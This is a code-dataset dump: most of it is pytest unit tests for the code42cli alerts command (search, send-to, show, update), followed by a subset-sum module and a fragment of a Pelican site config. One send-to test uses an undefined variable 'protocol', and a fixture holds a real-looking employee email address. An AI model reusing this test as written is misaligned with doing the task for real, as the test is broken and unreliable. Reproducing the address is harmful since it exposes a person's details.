\"test\"),\n (\"--rule-name\", \"test\"),\n (\"--exclude-rule-name\", \"test\"),\n (\"--rule-id\", \"test\"),\n (\"--exclude-rule-id\", \"test\"),\n (\"--rule-type\", \"FedEndpointExfiltration\"),\n (\"--exclude-rule-type\", \"FedEndpointExfiltration\"),\n (\"--description\", \"test\"),\n (\"--state\", \"OPEN\"),\n ],\n)\nALERT_DETAILS_FULL_RESPONSE = {\n \"type$\": \"ALERT_DETAILS_RESPONSE\",\n \"alerts\": [\n {\n \"type$\": \"ALERT_DETAILS\",\n \"tenantId\": \"11111111-2222-3333-4444-55559a126666\",\n \"type\": \"FED_ENDPOINT_EXFILTRATION\",\n \"name\": \"Some Burp Suite Test Rule\",\n \"description\": \"Some Burp Rule\",\n 
\"actor\": \"neilwin0415@code42.com\",\n \"actorId\": \"1002844444570300000\",\n \"target\": \"N/A\",\n \"severity\": \"HIGH\",\n \"ruleId\": \"e9bfa082-4541-4432-aacd-d8b2ca074762\",\n \"ruleSource\": \"Alerting\",\n \"id\": \"TEST-ALERT-ID-123\",\n \"createdAt\": \"2021-04-23T21:18:59.2032940Z\",\n \"state\": \"PENDING\",\n \"stateLastModifiedBy\": \"test@example.com\",\n \"stateLastModifiedAt\": \"2021-04-26T12:37:30.4605390Z\",\n \"observations\": [\n {\n \"type$\": \"OBSERVATION\",\n \"id\": \"f561e556-a746-4db0-b99b-71546adf57c4\",\n \"observedAt\": \"2021-04-23T21:10:00.0000000Z\",\n \"type\": \"FedEndpointExfiltration\",\n \"data\": {\n \"type$\": \"OBSERVED_ENDPOINT_ACTIVITY\",\n \"id\": \"f561e556-a746-4db0-b99b-71546adf57c4\",\n \"sources\": [\"Endpoint\"],\n \"exposureTypes\": [\"ApplicationRead\"],\n \"firstActivityAt\": \"2021-04-23T21:10:00.0000000Z\",\n \"lastActivityAt\": \"2021-04-23T21:15:00.0000000Z\",\n \"fileCount\": 1,\n \"totalFileSize\": 8326,\n \"fileCategories\": [\n {\n \"type$\": \"OBSERVED_FILE_CATEGORY\",\n \"category\": \"Image\",\n \"fileCount\": 1,\n \"totalFileSize\": 8326,\n \"isSignificant\": False,\n }\n ],\n \"files\": [\n {\n \"type$\": \"OBSERVED_FILE\",\n \"eventId\": \"0_c4e43418-07d9-4a9f-a138-29f39a124d33_1002847122023325984_4b6d298c-8660-4cb8-b6d1-61d09a5c69ba_0\",\n \"path\": \"C:\\\\Users\\\\Test Testerson\\\\Downloads\",\n \"name\": \"mad cat - Copy.jpg\",\n \"category\": \"Image\",\n \"size\": 8326,\n }\n ],\n \"syncToServices\": [],\n \"sendingIpAddresses\": [\"174.20.92.47\"],\n \"appReadDetails\": [\n {\n \"type$\": \"APP_READ_DETAILS\",\n \"tabTitles\": [\n \"file.example.com - Super simple file sharing - Google Chrome\"\n ],\n \"tabUrl\": \"https://www.file.example.com/\",\n \"tabInfos\": [\n {\n \"type$\": \"TAB_INFO\",\n \"tabUrl\": \"https://www.file.example.com/\",\n \"tabTitle\": \"example - Super simple file sharing - Google Chrome\",\n }\n ],\n \"destinationCategory\": \"Uncategorized\",\n \"destinationName\": \"Uncategorized\",\n \"processName\": \"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n }\n ],\n },\n }\n ],\n \"note\": {\n \"type$\": \"NOTE\",\n \"id\": \"72f8cd62-5cb8-4896-947d-f07e17053eaf\",\n \"lastModifiedAt\": \"2021-04-26T12:37:30.4987600Z\",\n \"lastModifiedBy\": \"test@example.com\",\n \"message\": \"TEST-NOTE-CLI-UNIT-TESTS\",\n },\n }\n ],\n}\nsearch_and_send_to_test = get_mark_for_search_and_send_to(\"alerts\")\n\n\n@pytest.fixture\ndef alert_extractor(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_extractor\")\n mock.return_value = mocker.MagicMock(spec=AlertExtractor)\n return mock.return_value\n\n\n@pytest.fixture\ndef alert_cursor_with_checkpoint(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_cursor_store\")\n mock_cursor = mocker.MagicMock(spec=AlertCursorStore)\n mock_cursor.get.return_value = CURSOR_TIMESTAMP\n mock.return_value = mock_cursor\n mock.expected_timestamp = \"2020-01-20T06:00:00+00:00\"\n return mock\n\n\n@pytest.fixture\ndef alert_cursor_without_checkpoint(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_cursor_store\")\n mock_cursor = mocker.MagicMock(spec=AlertCursorStore)\n mock_cursor.get.return_value = None\n mock.return_value = mock_cursor\n return mock\n\n\n@pytest.fixture\ndef begin_option(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts.convert_datetime_to_timestamp\")\n mock.return_value = BEGIN_TIMESTAMP\n mock.expected_timestamp = 
\"2020-01-01T06:00:00.000000Z\"\n return mock\n\n\n@pytest.fixture\ndef alert_extract_func(mocker):\n return mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._extract\")\n\n\n@pytest.fixture\ndef send_to_logger_factory(mocker):\n return mocker.patch(\"code42cli.cmds.search._try_get_logger_for_server\")\n\n\n@pytest.fixture\ndef full_alert_details_response(mocker):\n return create_mock_response(mocker, data=ALERT_DETAILS_FULL_RESPONSE)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_advanced_query_passed_as_json_string_builds_expected_query(\n cli_state, alert_extractor, runner, command\n):\n runner.invoke(\n cli, [*command, \"--advanced-query\", ADVANCED_QUERY_JSON], obj=cli_state,\n )\n passed_filter_groups = alert_extractor.extract.call_args[0]\n expected_actor_filter = f.Actor.contains(ADVANCED_QUERY_VALUES[\"actor\"])\n expected_actor_filter.filter_clause = \"OR\"\n expected_timestamp_filter = f.DateObserved.in_range(\n ADVANCED_QUERY_VALUES[\"on_or_after_timestamp\"],\n ADVANCED_QUERY_VALUES[\"on_or_before_timestamp\"],\n )\n expected_state_filter = f.AlertState.is_in(\n [\n ADVANCED_QUERY_VALUES[\"state_1\"],\n ADVANCED_QUERY_VALUES[\"state_2\"],\n ADVANCED_QUERY_VALUES[\"state_3\"],\n ]\n )\n expected_rule_id_filter = f.RuleId.eq(ADVANCED_QUERY_VALUES[\"rule_id\"])\n expected_rule_id_filter.filter_clause = \"OR\"\n assert expected_actor_filter in passed_filter_groups\n assert expected_timestamp_filter in passed_filter_groups\n assert expected_state_filter in passed_filter_groups\n assert expected_rule_id_filter in passed_filter_groups\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_without_advanced_query_uses_only_the_extract_method(\n cli_state, alert_extractor, runner, command\n):\n\n runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert alert_extractor.extract.call_count == 1\n assert alert_extractor.extract_advanced.call_count == 0\n\n\n@advanced_query_incompat_test_params\ndef test_search_with_advanced_query_and_incompatible_argument_errors(\n arg, cli_state, runner\n):\n\n result = runner.invoke(\n cli,\n [\"alerts\", \"search\", \"--advanced-query\", ADVANCED_QUERY_JSON, *arg],\n obj=cli_state,\n )\n assert result.exit_code == 2\n assert f\"{arg[0]} can't be used with: --advanced-query\" in result.output\n\n\n@advanced_query_incompat_test_params\ndef test_send_to_with_advanced_query_and_incompatible_argument_errors(\n arg, cli_state, runner\n):\n\n result = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--advanced-query\", ADVANCED_QUERY_JSON, *arg],\n obj=cli_state,\n )\n assert result.exit_code == 2\n assert f\"{arg[0]} can't be used with: --advanced-query\" in result.output\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_and_end_dates_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=89)\n end_date = get_test_date_str(days_ago=1)\n\n runner.invoke(\n cli, [*command, \"--begin\", begin_date, \"--end\", end_date], obj=cli_state,\n )\n filters = alert_extractor.extract.call_args[0][0]\n actual_begin = get_filter_value_from_json(filters, filter_index=0)\n expected_begin = f\"{begin_date}T00:00:00.000000Z\"\n actual_end = get_filter_value_from_json(filters, filter_index=1)\n expected_end = f\"{end_date}T23:59:59.999999Z\"\n assert actual_begin == expected_begin\n assert actual_end == expected_end\n\n\n@search_and_send_to_test\ndef test_search_when_given_begin_and_end_date_and_times_uses_expected_query(\n cli_state, 
alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=89)\n end_date = get_test_date_str(days_ago=1)\n time = \"15:33:02\"\n runner.invoke(\n cli,\n [*command, \"--begin\", f\"{begin_date} {time}\", \"--end\", f\"{end_date} {time}\"],\n obj=cli_state,\n )\n filters = alert_extractor.extract.call_args[0][0]\n actual_begin = get_filter_value_from_json(filters, filter_index=0)\n expected_begin = f\"{begin_date}T{time}.000000Z\"\n actual_end = get_filter_value_from_json(filters, filter_index=1)\n expected_end = f\"{end_date}T{time}.000000Z\"\n assert actual_begin == expected_begin\n assert actual_end == expected_end\n\n\n@search_and_send_to_test\ndef test_search_when_given_begin_date_and_time_without_seconds_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n date = get_test_date_str(days_ago=89)\n time = \"15:33\"\n runner.invoke(cli, [*command, \"--begin\", f\"{date} {time}\"], obj=cli_state)\n actual = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=0\n )\n expected = f\"{date}T{time}:00.000000Z\"\n assert actual == expected\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_end_date_and_time_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=10)\n end_date = get_test_date_str(days_ago=1)\n time = \"15:33\"\n runner.invoke(\n cli,\n [*command, \"--begin\", begin_date, \"--end\", f\"{end_date} {time}\"],\n obj=cli_state,\n )\n actual = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=1\n )\n expected = f\"{end_date}T{time}:00.000000Z\"\n assert actual == expected\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_more_than_ninety_days_back_errors(\n cli_state, runner, command\n):\n begin_date = get_test_date_str(days_ago=91) + \" 12:51:00\"\n result = runner.invoke(cli, [*command, \"--begin\", begin_date], obj=cli_state)\n assert \"must be within 90 days\" in result.output\n assert result.exit_code == 2\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_past_90_days_and_use_checkpoint_and_a_stored_cursor_exists_and_not_given_end_date_does_not_use_any_event_timestamp_filter(\n cli_state, alert_cursor_with_checkpoint, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=91) + \" 12:51:00\"\n runner.invoke(\n cli,\n [*command, \"--begin\", begin_date, \"--use-checkpoint\", \"test\"],\n obj=cli_state,\n )\n assert not filter_term_is_in_call_args(alert_extractor, f.DateObserved._term)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_and_not_use_checkpoint_and_cursor_exists_uses_begin_date(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=1)\n runner.invoke(cli, [*command, \"--begin\", begin_date], obj=cli_state)\n actual_ts = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=0\n )\n expected_ts = f\"{begin_date}T00:00:00.000000Z\"\n assert actual_ts == expected_ts\n assert filter_term_is_in_call_args(alert_extractor, f.DateObserved._term)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_end_date_is_before_begin_date_causes_exit(\n cli_state, runner, command\n):\n begin_date = get_test_date_str(days_ago=1)\n end_date = get_test_date_str(days_ago=3)\n result = runner.invoke(\n cli, [*command, \"--begin\", begin_date, \"--end\", end_date], obj=cli_state,\n )\n assert result.exit_code == 2\n assert 
\"'--begin': cannot be after --end date\" in result.output\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_only_begin_calls_extract_with_expected_filters(\n cli_state, alert_extractor, begin_option, runner, command\n):\n res = runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert res.exit_code == 0\n assert (\n str(alert_extractor.extract.call_args[0][0])\n == '{\"filterClause\":\"AND\", \"filters\":[{\"operator\":\"ON_OR_AFTER\", \"term\":\"createdAt\", '\n f'\"value\":\"{begin_option.expected_timestamp}\"}}]}}'\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_without_begin_and_without_stored_checkpoint_causes_expected_error(\n cli_state, alert_cursor_without_checkpoint, runner, command\n):\n result = runner.invoke(cli, [*command, \"--use-checkpoint\", \"test\"], obj=cli_state)\n assert result.exit_code == 2\n assert (\n \"--begin date is required for --use-checkpoint when no checkpoint exists yet.\"\n in result.output\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_with_begin_and_without_checkpoint_calls_extract_with_begin_date(\n cli_state,\n alert_extractor,\n begin_option,\n alert_cursor_without_checkpoint,\n runner,\n command,\n):\n res = runner.invoke(\n cli, [*command, \"--use-checkpoint\", \"test\", \"--begin\", \"1d\"], obj=cli_state,\n )\n assert res.exit_code == 0\n assert len(alert_extractor.extract.call_args[0]) == 1\n assert begin_option.expected_timestamp in str(\n alert_extractor.extract.call_args[0][0]\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_with_begin_and_with_stored_checkpoint_calls_extract_with_checkpoint_and_ignores_begin_arg(\n cli_state, alert_extractor, alert_cursor_with_checkpoint, runner, command\n):\n result = runner.invoke(\n cli, [*command, \"--use-checkpoint\", \"test\", \"--begin\", \"1h\"], obj=cli_state,\n )\n assert result.exit_code == 0\n assert alert_extractor.extract.call_count == 1\n assert (\n f\"checkpoint of {alert_cursor_with_checkpoint.expected_timestamp} exists\"\n in result.output\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_actor_is_uses_username_filter(\n cli_state, alert_extractor, runner, command\n):\n actor_name = \"test.testerson\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--actor\", actor_name], obj=cli_state\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.is_in([actor_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_actor_uses_actor_filter(\n cli_state, alert_extractor, runner, command\n):\n actor_name = \"test.testerson\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--exclude-actor\", actor_name], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.not_in([actor_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_name_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_name = \"departing employee\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--rule-name\", rule_name], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleName.is_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_name_uses_rule_name_not_filter(\n cli_state, 
alert_extractor, runner, command\n):\n rule_name = \"departing employee\"\n runner.invoke(\n cli,\n [*command, \"--begin\", \"1h\", \"--exclude-rule-name\", rule_name],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleName.not_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_type_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_type = \"FedEndpointExfiltration\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--rule-type\", rule_type], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleType.is_in([rule_type])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_type_uses_rule_name_not_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_type = \"FedEndpointExfiltration\"\n runner.invoke(\n cli,\n [*command, \"--begin\", \"1h\", \"--exclude-rule-type\", rule_type],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleType.not_in([rule_type])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_id_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_id = \"departing employee\"\n runner.invoke(cli, [*command, \"--begin\", \"1h\", \"--rule-id\", rule_id], obj=cli_state)\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleId.is_in([rule_id])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_id_uses_rule_name_not_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_id = \"departing employee\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--exclude-rule-id\", rule_id], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleId.not_in([rule_id])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_description_uses_description_filter(\n cli_state, alert_extractor, runner, command\n):\n description = \"test description\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--description\", description], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Description.contains(description)) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_multiple_search_args_uses_expected_filters(\n cli_state, alert_extractor, runner, command\n):\n actor = \"test.testerson@example.com\"\n exclude_actor = \"flag.flagerson@example.com\"\n rule_name = \"departing employee\"\n\n runner.invoke(\n cli,\n [\n *command,\n \"--begin\",\n \"1h\",\n \"--actor\",\n actor,\n \"--exclude-actor\",\n exclude_actor,\n \"--rule-name\",\n rule_name,\n ],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.is_in([actor])) in filter_strings\n assert str(f.Actor.not_in([exclude_actor])) in filter_strings\n assert str(f.RuleName.is_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_or_query_flag_produces_expected_query(\n runner, cli_state, command\n):\n begin_date = get_test_date_str(days_ago=10)\n test_actor = \"test@example.com\"\n test_rule_type = \"FedEndpointExfiltration\"\n 
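# --or-query should merge the actor and rule-type filters into a single OR group while the createdAt filter keeps its own AND group; expected_query below spells this out.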
runner.invoke(\n cli,\n [\n *command,\n \"--or-query\",\n \"--begin\",\n begin_date,\n \"--actor\",\n test_actor,\n \"--rule-type\",\n test_rule_type,\n ],\n obj=cli_state,\n )\n expected_query = {\n \"tenantId\": None,\n \"groupClause\": \"AND\",\n \"groups\": [\n {\n \"filterClause\": \"AND\",\n \"filters\": [\n {\n \"operator\": \"ON_OR_AFTER\",\n \"term\": \"createdAt\",\n \"value\": f\"{begin_date}T00:00:00.000000Z\",\n }\n ],\n },\n {\n \"filterClause\": \"OR\",\n \"filters\": [\n {\"operator\": \"IS\", \"term\": \"actor\", \"value\": \"test@example.com\"},\n {\n \"operator\": \"IS\",\n \"term\": \"type\",\n \"value\": \"FedEndpointExfiltration\",\n },\n ],\n },\n ],\n \"pgNum\": 0,\n \"pgSize\": 500,\n \"srtDirection\": \"asc\",\n \"srtKey\": \"CreatedAt\",\n }\n actual_query = json.loads(str(cli_state.sdk.alerts.search.call_args[0][0]))\n assert actual_query == expected_query\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_extraction_handles_error_expected_message_logged_and_printed_and_global_errored_flag_set(\n runner, cli_state, caplog, command\n):\n errors.ERRORED = False\n exception_msg = \"Test Exception\"\n cli_state.sdk.alerts.search.side_effect = Exception(exception_msg)\n with caplog.at_level(logging.ERROR):\n result = runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert \"Error:\" in result.output\n assert exception_msg in result.output\n assert exception_msg in caplog.text\n assert errors.ERRORED\n\n\n@pytest.mark.parametrize(\n \"protocol\", (ServerProtocol.TCP, ServerProtocol.TLS_TCP, ServerProtocol.UDP)\n)\ndef test_send_to_allows_protocol_arg(cli_state, runner, protocol):\n res = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--begin\", \"1d\", \"--protocol\", protocol],\n obj=cli_state,\n )\n assert res.exit_code == 0\n\n\ndef test_send_to_when_given_unknown_protocol_fails(cli_state, runner):\n res = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--begin\", \"1d\", \"--protocol\", \"ATM\"],\n obj=cli_state,\n )\n assert res.exit_code\n\n\ndef test_send_to_certs_and_ignore_cert_validation_args_are_incompatible(\n cli_state, runner\n):\n res = runner.invoke(\n cli,\n 
[\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n protocol,\n \"--ignore-cert-validation\",\n ],\n obj=cli_state,\n )\n assert (\n \"'--ignore-cert-validation' can only be used with '--protocol TLS-TCP'\"\n in res.output\n )\n\n\n@pytest.mark.parametrize(\"protocol\", (ServerProtocol.UDP, ServerProtocol.TCP))\ndef test_send_to_when_given_certs_with_non_tls_protocol_fails_expectedly(\n cli_state, runner, protocol\n):\n res = runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n protocol,\n \"--certs\",\n \"certs.pem\",\n ],\n obj=cli_state,\n )\n assert \"'--certs' can only be used with '--protocol TLS-TCP'\" in res.output\n\n\ndef test_get_alert_details_batches_results_according_to_batch_size(sdk):\n extraction._ALERT_DETAIL_BATCH_SIZE = 2\n sdk.alerts.get_details.side_effect = ALERT_DETAIL_RESULT\n extraction._get_alert_details(sdk, ALERT_SUMMARY_LIST)\n assert sdk.alerts.get_details.call_count == 10\n\n\ndef test_get_alert_details_sorts_results_by_date(sdk):\n extraction._ALERT_DETAIL_BATCH_SIZE = 2\n sdk.alerts.get_details.side_effect = ALERT_DETAIL_RESULT\n results = extraction._get_alert_details(sdk, ALERT_SUMMARY_LIST)\n assert results == SORTED_ALERT_DETAILS\n\n\ndef test_show_outputs_expected_headers(cli_state, runner, full_alert_details_response):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"Id\" in result.output\n assert \"RuleName\" in result.output\n assert \"Username\" in result.output\n assert \"ObservedDate\" in result.output\n assert \"State\" in result.output\n assert \"Severity\" in result.output\n assert \"Description\" in result.output\n\n\ndef test_show_outputs_expected_values(cli_state, runner, full_alert_details_response):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Values found in ALERT_DETAILS_FULL_RESPONSE.\n assert \"TEST-ALERT-ID-123\" in result.output\n assert \"Some Burp Suite Test Rule\" in result.output\n assert \"neilwin0415@code42.com\" in result.output\n assert \"2021-04-23T21:18:59.2032940Z\" in result.output\n assert \"PENDING\" in result.output\n assert \"HIGH\" in result.output\n assert \"Some Burp Rule\" in result.output\n\n\ndef test_show_when_alert_has_note_includes_note(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Note is included in `full_alert_details_response` initially.\n assert \"Note\" in result.output\n assert \"TEST-NOTE-CLI-UNIT-TESTS\" in result.output\n\n\ndef test_show_when_alert_has_no_note_excludes_note(\n mocker, cli_state, runner, full_alert_details_response\n):\n response_data = dict(ALERT_DETAILS_FULL_RESPONSE)\n response_data[\"alerts\"][0][\"note\"] = None\n cli_state.sdk.alerts.get_details.return_value = create_mock_response(\n mocker, data=response_data\n )\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Note is included in `full_alert_details_response` initially.\n assert \"Note\" not in result.output\n\n\ndef test_show_when_alert_not_found_output_expected_error_message(\n cli_state, runner, custom_error\n):\n 
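# Make the mocked py42 client raise its 404 error so the alert-not-found message is exercised.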
cli_state.sdk.alerts.get_details.side_effect = Py42NotFoundError(custom_error)\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"No alert found with ID 'TEST-ALERT-ID'.\" in result.output\n\n\ndef test_show_when_alert_has_observations_and_includes_observations_outputs_observations(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(\n cli,\n [\"alerts\", \"show\", \"TEST-ALERT-ID\", \"--include-observations\"],\n obj=cli_state,\n )\n assert \"Observations:\" in result.output\n assert \"OBSERVATION\" in result.output\n assert \"f561e556-a746-4db0-b99b-71546adf57c4\" in result.output\n assert \"observedAt\" in result.output\n assert \"FedEndpointExfiltration\" in result.output\n\n\ndef test_show_when_alert_has_observations_and_excludes_observations_does_not_output_observations(\n cli_state, runner, full_alert_details_response\n):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"Observations:\" not in result.output\n\n\ndef test_show_when_alert_does_not_have_observations_and_includes_observations_outputs_no_observations(\n mocker, cli_state, runner\n):\n response_data = dict(ALERT_DETAILS_FULL_RESPONSE)\n response_data[\"alerts\"][0][\"observations\"] = None\n cli_state.sdk.alerts.get_details.return_value = create_mock_response(\n mocker, data=response_data\n )\n result = runner.invoke(\n cli,\n [\"alerts\", \"show\", \"TEST-ALERT-ID\", \"--include-observations\"],\n obj=cli_state,\n )\n assert \"No observations found\" in result.output\n assert \"Observations:\" not in result.output\n assert \"FedEndpointExfiltration\" not in result.output\n\n\ndef test_update_when_given_state_calls_py42_update_state(cli_state, runner):\n runner.invoke(\n cli,\n [\"alerts\", \"update\", \"TEST-ALERT-ID\", \"--state\", AlertState.PENDING],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_state.assert_called_once_with(\n AlertState.PENDING, [\"TEST-ALERT-ID\"], note=None\n )\n\n\ndef test_update_when_given_state_and_note_calls_py42_update_state_and_includes_note(\n cli_state, runner\n):\n runner.invoke(\n cli,\n [\n \"alerts\",\n \"update\",\n \"TEST-ALERT-ID\",\n \"--state\",\n AlertState.PENDING,\n \"--note\",\n \"test-note\",\n ],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_state.assert_called_once_with(\n AlertState.PENDING, [\"TEST-ALERT-ID\"], note=\"test-note\"\n )\n\n\ndef test_update_when_given_note_and_not_state_calls_py42_update_note(cli_state, runner):\n runner.invoke(\n cli,\n [\"alerts\", \"update\", \"TEST-ALERT-ID\", \"--note\", \"test-note\"],\n obj=cli_state,\n )\n cli_state.sdk.alerts.update_note.assert_called_once_with(\n \"TEST-ALERT-ID\", \"test-note\"\n )\n\n\ndef test_bulk_update_uses_expected_arguments(runner, mocker, cli_state_with_user):\n bulk_processor = mocker.patch(\"code42cli.cmds.alerts.run_bulk_process\")\n with runner.isolated_filesystem():\n with open(\"test_update.csv\", \"w\") as csv:\n csv.writelines(\n [\"id,state,note\\n\", \"1,PENDING,note1\\n\", \"2,IN_PROGRESS,note2\\n\"]\n )\n runner.invoke(\n cli,\n [\"alerts\", \"bulk\", \"update\", \"test_update.csv\"],\n obj=cli_state_with_user,\n )\n assert bulk_processor.call_args[0][1] == [\n {\"id\": \"1\", \"state\": \"PENDING\", \"note\": \"note1\"},\n {\"id\": \"2\", \"state\": \"IN_PROGRESS\", \"note\": \"note2\"},\n 
]\n","sub_path":"tests/cmds/test_alerts.py","file_name":"test_alerts.py","file_ext":"py","file_size_in_byte":37730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"495327373","text":"def solve_memoized(array, target, index=0, memo=None):\n \"\"\"\n memoized\n \"\"\"\n # A None default avoids sharing one memo dict across separate calls.\n if memo is None:\n memo = {}\n if target == 0:\n return True\n if target < 0:\n return False\n if index >= len(array):\n return False\n if (index, target) in memo:\n return memo[(index, target)]\n x = solve_memoized(array, target, index + 1, memo)\n y = solve_memoized(array, target - array[index], index + 1, memo)\n memo[(index, target)] = x or y\n return memo[(index, target)]\n\ndef solve_bottom_up(array, target):\n \"\"\"\n bottom up\n \"\"\"\n dp = [[False for _ in range(target + 1)] for _ in range(len(array) + 1)]\n for i in range(len(array) + 1):\n dp[i][0] = True\n for t in range(1, target + 1):\n for i in range(1, len(array) + 1):\n dp[i][t] = dp[i - 1][t]\n if t - array[i - 1] >= 0:\n dp[i][t] = dp[i][t] or dp[i - 1][t - array[i - 1]]\n return dp[-1][-1]\n","sub_path":"algorithms/subset_sum.py","file_name":"subset_sum.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597957930","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Matt Clark'\nSITENAME = u'mattclarkdotnet'\nSITEURL = 'https://mattclark.net'\n\nTHEME = 'notmyidea'\n\nPATH = 'content'\nSTATIC_PATHS = ['images', 'articles']\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Python', 